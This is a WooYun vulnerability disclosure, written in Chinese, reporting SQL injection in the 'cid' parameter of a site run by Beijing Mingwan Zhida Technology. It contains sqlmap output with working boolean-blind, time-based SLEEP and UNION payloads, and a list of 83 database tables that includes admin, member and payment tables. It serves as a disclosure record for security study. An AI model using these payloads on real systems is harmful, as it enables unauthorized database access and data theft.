漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0155831
漏洞标题:北京铭万智达科技某站存在sql注入漏洞
相关厂商:北京铭万智达科技有限公司
漏洞作者: 路人甲
提交时间:2015-11-25 16:17
修复时间:2015-11-30 16:18
公开时间:2015-11-30 16:18
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-25: 细节已通知厂商并且等待厂商处理中
2015-11-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
1
详细说明:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=311) AND 4857=4857 AND (4474=4474
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cid=311) AND (SELECT * FROM (SELECT(SLEEP(5)))aGgW) AND (7604=7604
Type: UNION query
Title: Generic UNION query (NULL) - 30 columns
Payload: cid=311) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,CONCAT(0x716a627671,0x506b4c615179515665504c754e67484967795143675853794e5057
566c5a57677641426b6e43624e,0x716b6b6a71),NULL,NULL,NULL,NULL-- -
---
[15:53:50] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22, PHP 5.4.5
back-end DBMS: MySQL 5.0.12
漏洞证明:
Database: dd20141204093045995
[83 tables]
+---------------------+
| mo_accessory |
| mo_admin |
| mo_admin_log |
| mo_admin_role |
| mo_admin_shortcut |
| mo_adposition |
| mo_adtype |
| mo_advert |
| mo_area |
| mo_article |
| mo_attribute |
| mo_category |
| mo_comment |
| mo_company |
| mo_content_resource |
| mo_faillogin |
| mo_field |
| mo_goods |
| mo_goods_album |
| mo_goods_attr |
| mo_goods_attr_value |
| mo_goods_brand |
| mo_goods_link_goods |
| mo_goods_sort |
| mo_goods_type |
| mo_guide |
| mo_imc_app |
| mo_imc_users |
| mo_link |
| mo_linkage |
| mo_linkage_bill |
| mo_mailstate |
| mo_mailtemplate |
| mo_maintable |
| mo_manager_cate_per |
| mo_member |
| mo_member_1 |
| mo_member_2 |
| mo_member_cate_per |
| mo_member_group |
| mo_member_level |
| mo_message_283 |
| mo_message_284 |
| mo_message_manage |
| mo_mix_model |
| mo_mobile_contact |
| mo_mobile_header |
| mo_mobile_index |
| mo_mobile_search |
| mo_mobile_webset |
| mo_model |
| mo_msg_message |
| mo_msg_relation |
| mo_news |
| mo_payment |
| mo_permission |
| mo_person |
| mo_position |
| mo_position_info |
| mo_qrcode |
| mo_qrposition |
| mo_registdeal |
| mo_remind |
| mo_role_permission |
| mo_scores_rule |
| mo_search |
| mo_searchs |
| mo_seo_link |
| mo_seo_meta |
| mo_seo_search |
| mo_seo_tag |
| mo_session |
| mo_site_log |
| mo_special |
| mo_special_assort |
| mo_special_manager |
| mo_special_member |
| mo_special_section |
| mo_special_type |
| mo_synchronize |
| mo_tag_info |
| mo_upgrade_log |
| mo_web_config |
+---------------------+
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-11-30 16:18
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无